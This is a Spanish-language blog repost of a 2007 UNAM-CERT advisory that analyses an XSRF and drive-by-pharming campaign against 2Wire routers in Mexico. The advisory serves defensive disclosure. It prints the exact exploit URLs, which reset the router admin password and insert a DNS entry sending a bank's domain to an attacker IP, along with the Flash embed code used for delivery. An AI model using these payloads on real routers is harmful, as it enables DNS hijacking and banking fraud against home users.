El Departamento de Seguridad en Computo de la UNAM (DSC/UNAM-CERT) ha detectado y reportado ataques web tipo pharming en los routers 2Wirey las técnicas de ataque son del tipo Cross-site request forgery (XSRF) y Drive-by-pharming, aunque estas fallas ya tienen tiempo reportadas no existe todavía una actualización de firmware que mitigue el problema y como sabemos, muchos modelos de estos routers son usados en México sienedo distribuidos por Telmex para las conexicoes aDSL, aqui pongo la nota com la información publicada por la DSC/UNAM-CERT. http://www.seguridad.unam.mx/doc/?ap=tutorial&id=196

Vulnerabilidad de autenticación en ruteadores 2Wire

Antecedentes

En los últimos días, el DSC/UNAM-CERT ha detectado la aparición de ataques web tipo pharming, enfocados a engañar a los usuarios víctimas para redirigirlos a sitios falsos de banca electrónica.

Las técnicas utilizadas en los ataques son Cross-site request forgery (XSRF) y Drive-by-pharming.

Cross-site request forgery (XSRF). Se trata de una técnica intrusiva también conocida como “one click attack” o “session riding”. El ataque se basa en la inclusión de un script malicioso en alguna página web o correo; la víctima, con el simple hecho de navegar por la página con el código insertado estaría realizando sin su conocimiento, actividades escondidas previamente establecidas por el atacante (por ejemplo, modificar una configuración de un router a través de la interfase web) .

Drive-by-pharming. Esta técnica consiste en la modificación de los registros para resolución de nombres (DNS) y busca redirigir las peticiones de conexión de un usuario hacia un sistema comprometido por un atacante. Una modalidad consiste en modificar el archivo “hosts” de los equipos de las víctimas, pero una variante más difícil de detectar consiste en alterar los registros de resolución de nombres de los ruteadores caseros de banda ancha (DSL). Este ataque realizado usualmente con tecnologías como javascript y flash intenta identificar la marca y dirección del ruteador casero para poder comprometerlo exitosamente.

En México recientemente se han comenzado a detectar vectores de infección que utilizan las dos técnicas, es decir, se inserta código FLASH en páginas web que al ser navegadas por la víctima insertan registros de DNS en el ruteador casero para redirigir al usuario hacia un sitio falso de banca electrónica.

Si bien los ataques de “drive by pharming” fueron documentados desde Diciembre de 2006, es hasta ahora que se han visto activamente explotados en México por los defraudadores.

Las vulnerabilidades en los equipos 2Wire fueron publicadas en Agosto de 2007, sin embargo a la fecha no existe una actualización de firmware que mitigue el problema.

Aunque las alertas de seguridad establecen como requisito una sesión activa de administrador o la configuración por default de equipos ruteadores de diversas marcas, hemos detectado que ciertos modelos de la marca 2Wire son vulnerables y no requieren una configuración por default, ya que la contraseña de administrador puede ser sobrescrita por medio de XSRF.

---

Análisis del ataque

El DSC/UNAM-CERT obtuvo un correo que se presentaba como una carta electrónica de felicitación de un sitio mexicano popular. El router probado fue un 2Wire 2701.

 

Al hacer clic en la liga, el usuario es redireccionado hacia un sitio web donde se abre un código FLASH que lleva a cabo el ataque XSRF.

<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
name="index"
width="399" height="50"
s0rc="index.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>

Del archivo index.swf se obtienen las siguientes cadenas:

http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a “admin”. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.

Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.

La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como parámetro la nueva contraseña.

La URL del wizard de configuración:

xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38

Las variables de contraseña, confirmación y hint:

&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

A continuación, la misma página espera 5 segundos para enviar la segunda parte del ataque, esto lo realiza a través del siguiente META:

<meta http-equiv="refresh" content="5;url=./postal.html" />

Los 5 segundos de espera tienen la finalidad de esperar a que la primera parte del ataque concluya el reseteo de la contraseña. Después de ese periodo se abre la página postal.html que incluye código para mostrar una animación auténtica y a la vez abrir otra animación FLASH:

<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
name="banner"
width="743" height="87"
src="banner.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>
 
<embed
src="http://i.gusanito.com/g/gusanito/cards/4011/card.swf" quality="high"
pluginspage="http://www.macromedia.com/shockwave/download/"
type="application/x-shockwave-flash" width="550"
height="300"></embed>

El archivo banner.swf es el encargado de realizar la segunda parte del ataque y contiene las siguientes cadenas:

http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95

En esta etapa se intentan agregar registros de resolución de nombres (DNS) a cada posible dirección donde se encuentra el router potencialmente (home, gateway.2wire.net, 192.168.1.254, 192.168.0.1, etc.), por lo que es posible que en una siguiente versión se llegue a automatizar este comportamiento.

Finalmente se puede verificar en el router comprometido que han sido agregados registros sin conocimiento del usuario:

 

Es importante destacar que todo el proceso es muy transparente para la víctima, ya que no se muestra actividad intrusiva evidente en el navegador y el antivirus no reporta anomalía alguna dado que no se descarga ningún binario.

 

---

Vectores de infección

• Animaciones FLASH (tarjetas de felicitación, presentaciones, etc.)
• Javascript (páginas web con scripts)
• HTML plano (blogger, websites estáticos, etc.)

 

---

Prueba de concepto

Se creo un blog en el servicio blogger, en esta página se insertó el exploit en HTML plano. La contraseña es sobrescrita a “admin”.

http://2wire-poc.blogspot.com

 

---

Solución

No existe una solución definitiva al día de hoy. Una actualización de firmware resolvería la vulnerabilidad. El proveedor ha sido notificado del problema.

Para identificar si el ruteador ha sido comprometido, desde el navegador se puede verificar en la tabla de resolución de nombres del 2Wire:

http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38
http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38
http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38
http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38
http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38

Si el navegador muestra una pantalla con un listado de direcciones IP asociadas a dominios diversos (especialmente de banca electrónica) el ruteador muy probablemente ha sido comprometido

 

Para solucionar temporalmente el problema se deben eliminar manualmente los registros ingresados con el botón de “remove”

---

Referencias

http://www.symantec.com/avcenter/reference/Driveby_Pharming.pdf
http://xforce.iss.net/xforce/xfdb/36044
http://secunia.com/advisories/26496
http://www.securityfocus.com/archive/1/archive/1/476595/100/0/threaded
http://blog.hispasec.com/laboratorio/255

---

Revisión histórica

• Liberación Original: 6 de diciembre de 2007
• Última Actualización y Revisión: 6 de diciembre de 2007

 

El Departamento de Seguridad en Computo/UNAM-CERT agradece el apoyo en la elaboración de este tutorial a:

• Captura de exploit/análisis: Eduardo Espina García (eespina at seguridad.unam.mx)

Revisión y asesoria en la elaboración del documento por:

• Análisis de malware: Luis Fernando Fuentes (lfuentes at seguridad.unam.mx)
• Análisis Windows: Jesús Ramón Jiménez Rojas(jrojas at seguridad.unam.mx)
• Pruebas: Juan Carlos Guel López (cguel at seguridad.unam.mx)

 

UNAM CERT
Equipo de Respuesta a Incidentes UNAM
Departamento de Seguridad en Cómputo
DGSCA - UNAM
E-Mail : seguridad@seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel : 56 22 81 69
Fax : 56 22 80 43